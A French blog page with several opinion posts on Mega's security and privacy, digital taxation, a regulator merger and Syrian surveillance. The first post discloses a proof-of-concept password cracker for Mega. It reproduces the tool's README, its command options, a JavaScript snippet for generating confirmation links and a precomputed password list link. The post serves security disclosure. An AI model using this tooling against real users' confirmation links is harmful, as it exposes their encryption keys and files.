MegaCracker : Et maintenant, le #Mega crack

3238029478_aa1df44c98On se doutait bien que le chateau de sable de l’ami Kim allait vite s’effondrer. Le marketing sur la crypto, c’est bien, l’implémentation correcte de mécanismes de chiffrement c’est mieux. J’avais, aux côtés de certains autres sceptiques, déjà émis les plus grandes reserves concernant l’utilisation de ce service en tentant de vous expliquer que la sécurité de Mega était bancale.

Il n’aura donc fallu que 48 heures pour que Steve Thomas ne vienne confirmer nos soupçons. Le p0c consiste en un cracker de mots de passe pour les fichiers “protégés” sur Mega. Il utilise le lien de confirmation de votre inscription. Ce dernier ne contient pas que le hash de votre mot de passe mais contient également votre clé privée chiffrée, et comme l’explique l’auteur, une fois cette dernière crackée, TOUS vos fichiers peuvent être déchiffrés. C’est le premier très serieux p0c venant confirmer nos craintes.

Particuliers comme entreprises, planquez bien vos liens de confirmations… you’re already p0wn3d.

Et voici le Megacracker

Et son Readme :

 

**** MegaCracker v0.1a ****

Cracks a Mega password from a confirmation link. Do NOT post your confirmation
link because it contains not only a hash of your password but your encrypted
master key. Once the master key is disclosed all your file can be decrypted.

./megacracker-64 [options]

-h|–hash=<string>
Confirmation link.

-H|–hash-file=<file>
File with confirmation links.

–help
Display help and exit.

-i|–input=<file>
File with passwords to test [default is stdin].

-I|–input-precomp=<file>
File with pregenerated data.

-o|–output=<file>
Output data to use later.

Copyright (c) 2013 Steve Thomas <steve AT tobtu DOT com>
This is free software: you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software
Foundation, either version 2 of the License, or (at your option) any later
version. There is NO WARRANTY, to the extent permitted by law.

—————
There are at least six things in the confirmation link:
* Encrypted master key (16 bytes)
* Password hash (16 bytes)
* Unknown field (15 bytes?)
* Email address
* Name
* Unknown field (8 bytes?)
This will extract the password hash and crack it.
This will except confirmation links in these forms (You can truncate the data after #confirm to 43 characters):
* https://mega.co.nz/#confirm…………………………………….
* mega.co.nz/#confirm…………………………………….
* #confirm…………………………………….
* …………………………………….
If you want to generate some you can run this in your web browser’s console:
var pw_aes = new sjcl.cipher.aes(prepare_key_pw(“password”));
base64urlencode(
a32_to_str(
encrypt_key(pw_aes, [rand(0x100000000),rand(0x100000000),rand(0x100000000),rand(0x100000000)]))+
a32_to_str(
encrypt_key(pw_aes, [rand(0x100000000),0,0,rand(0x100000000)])));
dqKqDkwkeaJZCSm8gOUTRsgil2fSec1H4J0i2Z8aIbg

This is a precomputed list of passwords. You can use this with -I|–input-precomp:
https://mega.co.nz/#!rYkkTYzA!B_qWf18rDV4NrXAFM4vwwCdYhvRY14zkFyMITAMQSeY

 

Thx @fo0_

Rapport Colin & Collin : recherche dividende fiscal numérique désespérément

bercyFiscaliser les géants, souvent américains, du Net, n’est pas une idée nouvelle. Elle est, aujourd’hui, plus que jamais, d’actualité. Le gouvernement s’attelle donc à trouver la bonne formule pour lutter contre les optimisations un peu trop optimisées des Apple, Google ou Facebook (…). Ces derniers ont pris la fâcheuse habitude de faire beaucoup de business dans nos contrées tout en évitant soigneusement d’être imposés de manière réaliste au regard du profit qu’ils dégagent.

Pierre Collin, conseiller d’Etat et  Nicolas Colin inspecteur des finances, ont donc été nommés l’été dernier pour produire un rapport visant à proposer des pistes pour remédier à cette situation. Le bien nommé rapport  Colin & Collin a donc exploré de nouvelles pistes pour tenter de refiscaliser nos gros « optimiseurs ». Dans la ligne de mire, et il faut avouer que la piste est assez intéressante, la taxation pourrait s’indexer sur les données personnelles collectées (souvent de manière massive et franchement limite sur la forme… cf. Facebook). L’enjeu pour la France comme pour l’Europe est de faire valoir ses droits dans le cadre de conventions fiscales régissant les règles de taxation des activités, bilatéralement, entre deux états.

Initialement dévoilé par Les Echos, l’approche du rapport Colin & Collin consiste à indexer la fiscalité de ces entreprises sur les volumes de données personnelles des citoyens français qu’elles collectent et exploitent :

« mais au lieu d’appliquer aux émissions de gaz à effet de serre, cette fiscalité s’appliquerait aux pratiques de collecte, de gestion et d’exploitation commerciale de données personnelles, issues d’utilisateurs localisés en France »

Cette approche arrive alors que l’OCDE planchait déjà sur la fiscalité issue des activités du numérique. Le gouvernement semble donc avoir bon espoir de les inscrire dans la loi de finance de 2014.

Fleur Pellerin avait d’ailleurs laissé entendre que cette piste était envisagée en confiant au Monde  :

« Nous ne pouvons pas continuer à nous laisser piller ainsi éternellement. Les données de citoyens français et européens sont exploitées, à leur insu, outre-Atlantique, et rapportent des centaines de millions de dollars aux géants du net ».

La bonne approche ?

Ce n’est probablement pas la seule, mais le mécanisme de collecte et d’utilisation de données personnelles, de manière massive, à des fins commerciales, me semble une approche fort intéressante. Les modalités restent évidemment à définir, mais je dois avouer que je ne suis pas réticent à cette idée. C’est toujours moins idiot qu’une “taxe Google” sur la publicité (même si dans les fait, ça reste relativement peu éloigné, attendu que la publicité se base exclusivement sur des données personnelles collectées et exploitées). Dans le cas de Google précisément, la taxation est rendue difficile par la constellation de produits et services de la firme, en constante évolution. Les pratiques de Google en matière de données personnelles que j’avais déjà pas mal évoqué ici, me semblent un critère qui tient la route. Pour une entreprise comme Amazon ou Ebay, ce devrait être encore plus simple. Pareil pour Facebook.

Mais pour une entreprise comme Twitter qui se cherche encore un business model, il faudra bien que nous parlions d’une imposition sur les bénéfices ou le chiffre d’affaires issue des contenus générés par les utilisateurs, leurs données personnelles ou leurs « traces » comme le rapport les appelle (logs exploitables commercialement).

Le seul volume de données personnelles ne devra pas cependant pas être le seul levier, nous allons voir qu’il y en a au moins 3 autres qui peuvent être pris en compte pour une fiscalité plus équitable et incitant ces entreprises à manipuler nos données avec un peu plus retenue qu’actuellement.

Données personnelles vs infrastructure

L’épisode du AdGate de Free nous a tristement rappelé qu’Internet était devenu dans l’inconscient de beaucoup « un marché à conquérir ». L’asymétrie des volumes échangés ne signifient cependant pas qualité des données échangées et encore moins une monétisation proportionnelle au mégabit. Une vidéo Youtube en HD est elle plus rentable que les données de 2 ans de surf d’un CSP+ ? A l’approche tuyaux vs contenus, on introduit donc un paramètre fort intéressant car à forte valeur ajoutée,et donc monétisable. Concernant les données personnelles, il y a en fait 4 leviers sur lesquels nous pourrions jouer pour établir nos barèmes fiscaux :

  • La collecte des données ;
  • Le traitement des données (processing) ;
  • L’utilisation des données (exploitation) ;
  • La durée de conservation des données (rétention) ;
  • L’éventuelle cession commerciale à des tiers.

Bref encore une fois, on voit qu’on a une latitude intéressante pour répondre de manière intelligente à la guerre se jouant entre diffuseurs de contenus générés par les utilisateurs et les fournisseurs d’accès à Internet qui ont pris l’habitude de “sponsoriser” les internautes qui souhaitent accéder à ces services tout autant que les sociétés qui les délivre. Cette approche me semble donc prompt à être respectueuse des principes fondateurs du Net, comme la neutralité des réseaux.

L’imposition du volume de données sortant

Il y a quand même un point qui a de quoi rendre un peu perplexe. En cas de non collaboration avec l’administration fiscale, les entreprises pourraient se voir taxées sur le « volume de données sortant ». Là c’est un peu plus fumeux. Même si ce n’est pas la règle, ceci impliquera un dispositif de mesure du trafic sortant qui risque d’être un peu coton à mettre en place. Des accords avec les transitaires pourraient ajouter une couche d’opacité et même si ce n’est pas “impossible” , ça restera complexe à mettre en place et surtout, à contrôler. En outre c’est le meilleur moyen de mettre en place des outils dont certains abuseront en finissant par brider l’accès à certains services ou à poser des quotas sur les volumes échanger puis appliquer du packet shaping… attention donc à la mise en oeuvre. Ceci implique aussi que l’administration fiscale devra se rapprocher des fournisseurs d’accès pour que ces derniers leur fournissent en toute impartialité les chiffres de volumes échangés.

Il va également sans dire que dans ce cas précis on va vers l’officialisation de la mort du peering attendu que fiscaliser au volume, ça ne se fera pas à sens unique sans que les services en questions n’opposent contrepartie.

C’est bien ?

La piste des données personnelles est fort intéressante car les volumes collectés, l’utilisation (pour tous les services proposés, services en perpétuelles évolution), les traitements faits (cession à des tiers pour croisement par exemple) et enfin la durée de conservation, vont nous permettre de nous baser sur quelque chose de « juste », incitant ces entreprises à se conformer avec la vision européenne de ce que doit être une manipulation “saine” de données personnelles.

On sent que l’harmonisation au niveau européen pourra se faire relativement aisément puisque nous sommes déjà dotés de textes et règlement encadrant la protection des données personnelles des citoyens européens, même si ces derniers sont largement perfectibles. La fiscalité pourrait même presser les parlementaires européens à parfaire notre arsenal autour de la protection de la vie privée.

Je reste donc un peu suspendu à l’accueil que le gouvernement fera à ce rapport surtout à son éventuelle mise en place pour la loi de finance 2014, ainsi qu’à l’accueil que nos voisins européens lui feront, et dans quelle mesure ils le suivront.

Deux bien saines lecture sur le sujet à sons de cloches très sensiblement différents (thx @fano):

Le #Mega coup d’esbroufe de Kim Dotcom est une opération réussie

FilesharingIl nous avait promis un site révolutionnaire qui allait changer le monde, on a au final une usine à gaz dont tout le monde parle mais sur laquelle, au final, très peu de gens ont réussi à uploader le moindre fichier. Il nous avait promis un système de partage sécurisé qui allait devenir le temple de l’échange de particulier à particulier, et on se retrouve avec un site bien commercial qui sera sous peu agrémenté de publicités… et manque de bol, une vulnérabilité faisait que le seul truc qu’on aurait pu réussir à partager était sa clé privée RSA sensée assurer “votre sécurité”. Le respect de la vie privée des utilisateurs est elle aussi sujette à extrême prudence, sachez qu’il n’y en a tout simplement pas.

Capture d’écran 2013-01-20 à 19.30.06

Indisponibilités à répétitions, sécurité hasardeuse, privacy inexistante, mécanismes cryptographiques comme argument commercial implémenté avec les pieds, tout juste bon à se dédouaner face à une justice qui le tient à l’oeil… mais comment Kim Dotcom arrive t-il encore à berner son petit monde avec ce site ?

C’est simple… le FBI a fait de lui un martyr. En décidant il y a un an d’éradiquer Megaupload de la toile, les copyright trolls et le FBI lui ont donné une visibilité rêvée. Cette visibilité, c’est son plus gros capital, et il sait s’en servir. Bien fait a t-on presqu’envie de dire. Et très franchement, je le dirais s’il n’y avait pas les utilisateurs au milieu. La fermeture de Megaupload a donné lieu au coup de départ des ayants-droit d’une offensive sur le direct download. Ce n’est quelque part pas un mal car ces sites, tous bien commerciaux, ne peuvent décemment se faire les chantres de l’échange non commercial.

Et pourtant, c’est bien un tour de force que Mega est en train de réussir. Le nombre incalculable d’articles de presse qui vantent l’outil pachydermique de Kim est ahurissant. Ses offres commerciales sont présentées un peu partout, comme parfaitement légales, et effectivement elles le sont telles que présentées dans ses conditions générales de vente et d’utilisation du service. Et il faut dire qu’il a fait profil bas concernant cette volonté de devenir la Mecque du warez qu’il affichait un peu plus ostensiblement à l’époque de Megaupload.

Mega se veut plus “respectable”. Kim n’offre pas les outils de recherche de fichiers contrefaits sur son site, il est plus malin, il fournit juste l’API qui permettra à des tiers de le faire. Il offre bien une possibilité de partager sur le papier mais ne nous y trompons pas, la manière dont il a restreint la mise à disposition au public des fichiers n’est qu’une posture juridique.

Le site n’était d’ailleurs pas encore officiellement lancé que l’url d’un site de recherche, Searchonmega, tournait déjà un peu partout sur le Net. Ce site vous allez le voir partout ou Mega sera. C’est un peu ce que le débrideur de liens premium était à Megaupload, vous allez en voir des dizaines fleurir, il s’agira de sites bien commerciaux eux aussi, Kim ne sait que trop bien comment se créer un petit microcosme très rentable.

Si le succès est bien là pour Mega, le site ne manquera pas de cristalliser un peu plus la petite guéguerre des infrastructures que se livrent les FAI français, les éditeurs de contenus et les transitaires, comme Cogent, qui assure le transit de Mega. L’incident entre Cogent et Orange n’était qu’un apéritif, et ce dernier risque de ne pas être le seul à monter au créneau cette fois ci.

Capture d’écran 2013-01-20 à 19.50.39

En attendant, Kim Dotcom a réussi son coup de communication, il peut sans problème affirmer que le lancement de Mega est une opération réussie, mais l’engouement du lancement en grande pompes, c’est une chose. La piètre expérience utilisateurs offerte par Mega aura vite raison du site si ce dernier ne trouve pas LE truc qui assurera sa prospérité.

Non, #Mega n’est pas anonymisé !

kim-dotcomLa presse, du moins une certaine presse, a tendance à attribuer des supers pouvoirs au nouveau jouet la nouvelle pompe à cash de l’ami Kim Dotcom. Il y a tout d’abord l’aspect sécurité et le blindage tout relatif que nous avons un peu abordé ici. Mais on ne sait trop par quel raccourcis intellectuel certaines personnes assimilent la sécurité d’une infrastructure web à l’anonymisation des utilisateurs.

L’anonymat est une question complexe. On anonymise un flux de données par le biais du chiffrement, mais ceci ne suffit pas, loin de là. Une source d’upload dont le contexte n’est pas protégé est à peu près tout ce que vous voudrez mais certainement pas anonyme !

Mega ne propose strictement aucune solution d’anonymisation et se paye même le luxe d’une assez fumeuse politique de rétention et d’utilisation des données personnelles que Zataz expose d’ailleurs très bien ici. En plus des données normales de trafic que Mega stockera (mais combien de temps ?), l’ami Kim se réserve le droit d’exploiter vos informations bancaires, et le monsieur en connait un rayon, puisqu’il a été condamné 1998 pour plusieurs fraudes à la carte bleue.

Nous pouvons utiliser les informations que nous détenons sur vous, en tant que client, concernant votre solvabilité. Nous pouvons fournir cette information à une autre personne – évaluation du crédit et à des fins de recouvrement de créances -.

Dans le genre intrusif, on peut difficilement faire mieux. Bref si vous êtes un uploadeur compulsif faisant commerce de vos warez, soyez prévenus, c’est pas Kim vous fera des cadeaux et vous n’êtes _en rien_ anonymisés.

La super hyper giga haute autorité pseudo indépendante des intertubes… c’est maintenant

Une véritable catastrophe pour Internet semble être en route. Matignon aurait demandé à Arnaud Montebourg, Aurélie Filippetti et Fleur Pellerin d’étudier les modalités d’un rapprochement entre le CSA et l’ARCEP, et probablement l’HADOPI également même s’il n’en est pas encore explicitement fait mention. Dans son communiqué, le Premier Ministre s’exprime en ces termes :

Face à la convergence des infrastructures numériques, des services et des contenus qu’elles acheminent, des réseaux et des services fixes et mobiles, et des terminaux à l’usage du public, il est aujourd’hui essentiel de s’interroger sur l’efficacité des modes de régulation des communications électroniques et de l’audiovisuel, à l’heure où les contenus audiovisuels sont de plus en plus diffusés par l’internet fixe et mobile. En particulier, la diffusion des programmes audiovisuels acheminés par voie hertzienne est assortie d’une régulation des contenus destinée notamment à en assurer la qualité et la diversité, alors que les contenus diffusés via internet font l’objet d’une régulation plus limitée et parfois inadaptée“.

Internet, ce machin dont personne ne sait quoi faire

Ça ne fait jamais de mal de le répéter, Internet est un bien commun. En France cependant, aucun gouvernement n’a su lui attribuer la place qui lui convient. Internet a toujours été une dépendance plus ou moins directe du ministère des finances et du ministère de la culture. Internet, c’est une patate chaude. Reconnu par le conseil des sages comme un outil essentiel à l’exercice de la liberté d’expression. Aujourd’hui encore, le gouvernement au pouvoir ne voit en Internet qu’une sorte de vache à lait qu’il va bien falloir traire. Mais au lieu de traire la vache, ce dernier marque une obstination à traire le veau. Oui internaute, c’est bien de toi que je parle, c’est bien toi le veau… et on s’apprête à te traire. Pas financièrement, ça ce sera pour les Google, Youtube et autres gros consommateurs de bande passante. Du moins pas directement, car ça, c’est donner le feu vert aux FAI pour vous facturer l’utilisation de Google ou Youtube (en plus de celle d’Internet). Ne riez, pas ceci existe déjà dans les forfaits de téléphonie mobile. Mais il y a pire : c’est vos libertés que l’on va traire.

Les hautes autorités pseudos indépendantes

Commençons par les acteurs, ces “hautes autorités” vachement indépendantes et dépendant surtout des nomminations du président et de la majorité parlementaire en exercice. Pour le sujet qui nous anime aujourd’hui, elles ne sont pas deux, mais 4 (il y en a deux en embuscade) :

  • L’ARCEP, nous le savons, c’est le “gendarme des telecoms” dont le rôle aujourd’hui c’est surtout de demander chaque année aux fournisseurs d’accès Internet et aux opérateurs telecom “Alors ton réseau cette année il marche bien ?“. Une fois que l’opérateur lui a répondu “oui, ça fonctionne au poil“, l’ARCEP consigne dans son rapport annuel “l’Internet en France est le meilleur du monde, notre ADSL fonctionne tellement bien que personne ne veut passer au très haut débit“.
  • Le CSA (Conseil Supérieur de l’Audiovisuel) de son côté régule le “business des ressources rares”. Le CSA est en fait une sorte d’étiqueteur de rayon du supermarché des fréquences hertziennes, c’est tout de suite moins sexy que Conseil Supérieur de l’Audiovisuel, mais en pratique, son boulot, c’est étiqueteur.
  • L’ANFR (l’Agence nationale des fréquences) : comme la technique et le CSA, ça fait 4, il faut bien une autorité qui sait de quoi elle cause. Une fois que le CSA a mis un prix sur une fréquence, techniquement, c’est l’ANFR qui les attribue et vérifie qu’on déborde pas sur les fréquences du voisin.
  • L’HADOPI : celle ci je ne vous ferai pas l’affront de vous la présenter. Pour résumer, nous nous arrêterons sur la définition suivante : “la machine à spam la plus chère de l’histoire d’Internet ».

Chronologie d’une catastrophe annoncée

Ce rapprochement entre entités de régulation est malsain à bien des égards mais il n’est pas nouveau. Je vous en parlais dans ces pages en 2010, mais ça date en fait de fin 2006.

19 décembre 2006 : le rapport parlementaire Blessig ouvre les hostilités en préconisant un rapprochement entre régulateurs. Les concernés sont le CSA, L’ARCEP, et l’ANFR. Déjà en 2006 l’argument était d’amorcer le virage de la convergence entre Internet, téléphonie et télévision. On ne pouvait à l’époque lui prêter de mauvaises intentions.

Cette idée fut vite récupérée à d’autres fins que la simple convergence vers laquelle tout le monde s’accorde. L’un des plus fervents partisans de cette incongruité n’était autre que Frédéric Lefèbvre… en soi déjà, ça a de quoi foutre la trouille quand on se souvient de sa conception assez particulière d’Internet.

24 Novembre 2008 : Frédéric Lefèbvre présente un cavalier législatif (un article additionnel qui n’a rien à voir avec la choucroute) dans une loi sur l’audiovisuel public. Il vise à Introduire un peu de CSA dans Internet. Il défend son point de vue en arguant d’une nécessité de ce rapprochement pour la protection de l’enfance. Il le fit en en ces termes :

« Un nombre important de services de communication au public en ligne propose des contenus audiovisuels. Néanmoins, seuls les services de télévision et de radio ainsi que, grâce à la présente loi, les services de médias audiovisuels à la demande, offrent de réelles garanties en matière de protection de l’enfance et de respect de la dignité de la personne, grâce à la régulation du Conseil supérieur de l‘audiovisuel (CSA), qui dispose d’une vaste expérience dans ce domaine. »

« Il est donc proposé d’assurer, selon des modalités adaptées au monde de l’internet, la protection des mineurs par les autres services en ligne qui fournissent, dans un but commercial, des contenus audiovisuels à la demande. Cette protection doit être assurée notamment sur les sites de partages de vidéo dès lors que l’éditeur du service assure lui-même un agencement éditorial des contenus générés par les internautes. Ces modalités feront largement appel à l’auto-régulation. Le CSA pourra, après une large concertation avec les acteurs concernés, élaborer une charte de protection de l’enfance sur ces services et délivrer des labels à ceux d’entre eux qui la respecteront. Afin d’assurer l’efficacité de ce dispositif, il sera demandé que les logiciels de contrôle parental que les fournisseurs d’accès à internet doivent proposer à leurs abonnés, en application de la loi du 21 juin 2004 pour la confiance dans l’économie numérique, soient en mesure de reconnaître ces labels pour filtrer – si les parents le souhaitent – les sites qui n’en possèdent pas. »(…)

« Par ailleurs, il est proposé, par souci de cohérence et d’équité, que les services mentionnés ci-dessus, qui pourraient être définis comme des « services audiovisuels de partage et de complément », participent également au financement de la production d’œuvres cinématographiques et audiovisuelles dès lors qu’ils font concurrence aux autres services audiovisuels à la demande qui contribuent à ce financement. »

Décembre 2008  : Manque de bol, la protection de l’enfance n’avait su trouver une oreille assez attentive, le Frédéric passe donc la seconde… en fait non, il passe direct en cinquième avec nos fameux violeurs psychopathes nazis proxénètes qui planquent des médicaments contrefaits dans les armes  (à cette époque Frédéric nourri des ambitions autres que celle de député par concours de circonstance). Il revient donc à la charge avec sa fameuse tirade :

“La mafia s’est toujours développée là ou l’État était absent ; de même, les trafiquants d’armes, de médicaments ou d’objets volés et les proxénètes ont trouvé refuge sur Internet, et les psychopathes, les violeurs, les racistes et les voleurs y ont fait leur nid  » .

Et d’enfoncer le clou pour aller dans le sens d’une “régulation” :

L’absence de régulation du Net provoque chaque jour des victimes ! Combien faudra-t-il de jeunes filles violées pour que les autorités réagissent ? Combien faudra-t-il de morts suite à l’absorption de faux médicaments ? Combien faudra-t-il d’adolescents manipulés ? Combien faudra-t-il de bombes artisanales explosant aux quatre coins du monde ? Combien faudra-t-il de créateurs ruinés par le pillage de leurs œuvres ? Il est temps, mes chers collègues, que se réunisse un G20 du Net qui décide de réguler ce mode de communication moderne envahi par toutes les mafias du monde  ».

Le Frédéric, il avait bien envie de te le réguler ton Internet, de te le civiliser même. La mafia, les psychopathes, les violeurs, les pédophiles, les terroristes… si avec ça tu veux pas que je te régule, “comment comment veux-tu que je t’#@!%$ule ?  ».

Mi-Janvier 2011 : Eric Besson reprend la patate chaude d’Internet de l’économie Numérique, un ex-secrétariat d’Etat noyé quelque part entre le ministère de la culture et Bercy. Il émet alors une fausse nouvelle idée en ajoutant une autre autorité, il s’agit maintenant de fusionner non pas deux mais 3 hautes autorités : l’ARCEP, le CSA et l’ANFR… comme en 2006. Sacré Éric, et avec ça il a voulu nous faire croire qu’il bossait. Bon ok, il a un peu plus bossé que NKM en demandant l’interdiction d’héberger Wikileaks en France (Eric Besson échoue avec un certain succès, puisqu’en 2012, la France a finit avec grand mal à dépasser la Roumanie en taux de pénétration du THD (très haut débit).

Avril 2012 : Michel Boyon, président du CSA, nous explique sa conception d’un Internet régulé à la sauce CSA, et il pue son Internet, il n’est pas que régulé, il est surtout fiscalisé. Il l’exprime en ces termes :

on ne pourra pas indéfiniment faire coexister un secteur régulé, celui de l’audiovisuel, et un secteur non régulé, celui d’Internet  »

Pour lui la convergence est un danger et seul le CSA pourra voler au secours des chaines de télévision car le développement des téléviseurs connectés, toujours selon ses propos, créent :

une menace pour l’équilibre économique des chaînes  ».

Une fois de plus, on sent bien qu’il n’est plus question de “régulation” mais de fiscalisation. Le CSA son truc à lui c’est les pépettes rien que les pépettes et tout pour les pépettes.

Ensuite, un ange passe, Internet fait la fête, François Hollande est élu, on se dit qu’HADOPI du Fouquet’s c’est bientôt terminé, que la Neutralité du Net sera bientôt inscrite dans la loi… bande de gros naifs.

Début juillet 2012 : Après la fête, la gueule de bois… Aurélie Filippetti sur RTL émettait l’idée d’une extension de redevance sur l’audiovisuel public aux écrans d’ordinateurs ! Taxer un support matériel d’accès indispensable à Internet au lieu de taxer les bidules box des FAI qui donnent accès à cet “audiovisuel public”… déjà, ça ne sentait pas bon du tout. Le projet se fait plus précis, le gouvernement veut taxer Internet, la convergence média n’est en fait qu’une convergence fiscale déguisée.

Mi-juillet 2012 : sur Reflets je tentais d’expliquer pourquoi un tel rapprochement était une erreur incommensurable guidée par un appétit fiscal au risque de dynamiter un bien et un intérêt commun.  Au final, ni l’État, ni les entreprises qui pensent “être Internet”, ni les internautes qui le sont vraiment (Internet), on t quelque chose à y gagner.

22 juillet 2012 : toujours sur Reflets, cette fois, c’est Fleur Pellerin qui annonce la mise à mort de la neutralité du Net, pour elle, ce machin est un concept bien américain fabriqué de toutes pièces pour favoriser les américains. Ça a mis du monde en colère chez nous, Fabrice Epelboin en tête.

Un rapprochement qui s’appuie sur deux erreurs techniques

L’argument principal d’un tel rapprochement, c’est ce qu’on appelle la convergence. Entendez convergence du média des médias Internet avec les média télévision, radio ou tout ce qui peut être allègrement taxé usuellement mais que l’on a beaucoup de mal à taxer sur Internet.

Internet ne converge pas, il est, avec sa neutralité, la condition indispensable à toute convergence.

La première erreur, c’est la définition que l’on pose sur le terme “convergence” appliqué à Internet. Ce que l’on appelle convergence chez quelques technocrates, les techniciens eux, appellent ça une absorption. Le terme est d’ailleur mal choisi, mais Internet est devenu la glue, le réceptacle de ces médias. Il offre des ressources non rares, ces mêmes ressources autrefois rares, qui en d’autres temps, justifiaient l’existence d’une autorité comme le CSA. Il faut bien comprendre que les ressources rares sur Internet, comme l’attribution d’une fréquence hertzienne, ça n’existe pas… Sur Internet, les ressources rares, ce sont des noms de domaines et des blocs IP comme je l’expliquais ici. Mais là encore, ce n’est surement pas au CSA de les gérer, c’est des jouets pour les grands ça, pas pour un étiqueteur de supermarché. Les ressources rares d’Internet ont un truc bien à elles qui est génial :  quand il n’y en a plus et bien il y en a encore.

La seconde erreur (en rapport avec la première à cause des ressources rares) c’est une incompréhension technique de ce qui rentre et qui sort d’un tuyau et qui tient en deux notions : le broadcast et le multicast.

Le broadcast, c’est comme ça qu’un fourniseur d’accès à Internet vous vend de la VOD ou vous propose 4 fluxs HD simultannés. Le FAI émet, l’internaute reçoit, point final. Le FAI appelle ça pudiquement un service géré, un internaute averti appellera ça du minitel en 16 millions de couleurs.

Le multicast, c’est un peu plus fin, c’est la définition même d’Internet, dans lequel chaque Internaute peut recevoir ce qu’il demande à Google, Bing, Yahoo, Bittorrent ou Usenet ce qu’il SOUHAITE et non ce que son FAI lui PROPOSE DE CONSOMMER MOYENNANT FINANCES. Seconde subtilité, notre internaute qui fait de l’IP multicast comme monsieur Jourdain fait de la prose, il peut aussi et surtout émettre des données. Et oui, ça complexifie la donne de la régulation de comprendre qu’il y a en Internet le moyen de broadcaster en basant sur un réseau par définition multicast. Il y a aussi une difficulté à comprendre qu’en IP, sur notre Internet “moderne”, le broadcast dépend du multicast.

Notre nouvelle autorité aura donc pour rôle de réguler quoi au juste s’il n’y a pas de ressources rares à réguler ?

La réponse est dramatiquement simple : elle va réguler les contenus, les contenus que VOUS produisez, que NOUS produisons. Cette autorité ne va pas réguler des entreprises qui seront autant de netgoinfres à l’affut du moindre brevet pour s’accaparer commercialement un bout d’Internet, cette autorité, elle va NOUS réguler.

Fiscalisation, protection de la propriété intellectuelle et protection de l’enfance sont les trois nouvelles mamelles de la surveillance du Net

La protection de l’enfance, c’est le cyber cheval de bataille du CSA. L’autorité est d’ailleurs parfaitement claire sur la question, elle s’est maintes fois prononcée pour une labellisation des sites web, et même, IMPOSER le FILTRAGE de sites non labellisés ! On voudrait tuer Internet en France qu’on ne pourrait pas mieux s’y prendre. Fusionner ARCEP, CSA, ANFR, HADOPI, et pourquoi pas la SPA ? (Internet est plein de zoophiles!).

Ramener Internet, un bien commun, sur lequel nul gouvernement, nulle entreprise n’a de droit de cuissage, à un nouvel eldorado fiscal, est probablement la plus belle escroquerie intellectuelle que les politiques peuvent jouer aux internautes.

Il ne viendrait pas à l’idée du gouvernement de créer une haute autorité de régulation de l’air que nous respirons, c’est pourtant bien ce qu’il s’apprête à faire avec Internet. La première escarmouche gouvernementale sur le terrain fiscal, c’est ce qu’annonçait Aurelie Filippetti en voulant étendre la redevance sur l’audiovisuel public aux écrans d’ordinateurs. Il ne lui serait pas par exemple passé par la tête l’idée de renforcer la fiscalisation des biens culturels vendus par les fournisseurs d’accès Internet qui par ce biais menacent en permanence la notion de neutralité du Net, une notion qui est un dû aux internautes et non une option comme certains aiment à tenter de nous le faire gober… oui Orange, c’est bien de toi que je parle.

Une autorité de régulation des médias sur Internet, c’est un peu comme si on créait une autorité de régulation de la presse. Quel rôle positif pourrait jouer une telle autorité ? Aucun. Son rôle est exclusivement fiscal. Cette fiscalisation va permettre la petite mort en France de la Neutralité du Net. Les industriels n’auront plus qu’à se partager le gâteau sous la bienveillante connivance de cette nouvelle super hyper giga haute autorité pseudo indépendante.

– “Et alors ? Ça va me coûter combien mon truc gratuit ?”
– “Oh trois fois rien, juste ta liberté d’expression”

Fiscal ? Vous avez dit juste fiscal ? Oui… enfin… pour le moment. Vous vous doutez bien qu’en embuscade se cache l’HADOPI et surtout, les moines copistes de DVD et tous les adorateurs de saint-copyright. Concentrer tous les pouvoirs dans une seule autorité pseudo indépendante qui mettra le paquet sur la chasse aux téléchargeurs de MP3 ? “Jamais” vous dira un gouvernement socialiste (quoi que)… mais que se passera t-il au prochain changement de majorité ? Et bien le gouvernement socialiste aura créé malgré lui (ou pas) un splendide outil de surveillance et de censure d’Internet dont il remettra les clés à ces moines copistes de DVD.

Ce genre de rapprochement, c’est une idée vraiment lumineuse, surtout quand on sait comment sont constitués nommés les collèges de ces autorités.

 

De l’engagement

Syria-300x300Nos récents articles sur Reflets, celui sur Syria News, et celui sur le Parlement syrien, comme  chaque fois lorsque l’on parle de la Syrie, ont soulevé quelques commentaires exprimant une certaine perplexité. Ces commentaires sont parfois parfaitement construits et expriment des interrogations et  des réserves parfaitement légitimes. Nous essayons donc de répondre à ces commentaires, et c’est aussi un peu l’objet de ce billet. D’autres, plus péremptoires se veulent des leçons de geopolitique de comptoir, dispensées par des personnes qui, sous prétexte d’avoir rencontré deux syriens à leurs dernières vacances au ClubMed affirment que notre démarche est motivée par d’obscurs intérêts, que nous serions à la solde de la CIA, du Mossad, du MI6, quand nous ne cherchons pas à instaurer la Charia dans le Proche-Orient.

Notre réalité est cependant bien différente. Nous avons engagé une forme de lutte pacifique qui se limite en une réponse mesurée à ce qu’applique le gouvernement syrien en terme de propagande, de répression et de surveillance électronique.

Le gouvernement syrien, avec l’aide d’entreprises locales ou occidentales a décidé d’exercer une surveillance active de son réseau. Le but est clair, il s’agit de :

  • prévenir la diffusion de toute information qui lui serait défavorable ;
  • localiser, arrêter, torturer les émetteurs de ces informations, de ces documents vidéo ;
  • mener une propagande active à la gloire de la personne de Bachar Al Assad, tyran népotique au culte de sa propre personne bien affirmé.

Les réseaux de propagande du régime syrien sont internationaux, à l’image du site Infosyrie.fr, “l’Agence de ré-information” sur l’actualité en Syrie, proche de l’extrême droite française et financé par le régime syrien lui même.

☠ Pourquoi s’engager ?

En ce qui me concerne, et ceci n’est probablement pas valable pour d’autres qui s’engagent eux aussi, je puise ma motivation de nombreux échanges avec des syriens. Certains anti régimes qui ont vu leurs proches massacrés ou persécutés, mais surtout par une majorité de gens qui ne sont ni pros, ni antis, mais qui subissent au quotidien, depuis 18 mois, une guerre civile.

Je ne pense pas personnellement me battre pour une démocratie en Syrie, le terme démocratie étant lui même soumis à interpretation de chacun, même chez nous. Encore faut-il croire en nos définitions de la démocratie, et bien naif faut-il être pour penser que notre conception de cette dernière est transposable n’importe où.

Si je m’engage sur ce terrain cybernétique qui est le mien, c’est d’abord pour essayer de rétablir un équilibre entre un régime qui déploie de gros moyens pour surveiller Internet, et des internautes qui souhaitent accéder à une information que le régime lui refuse.

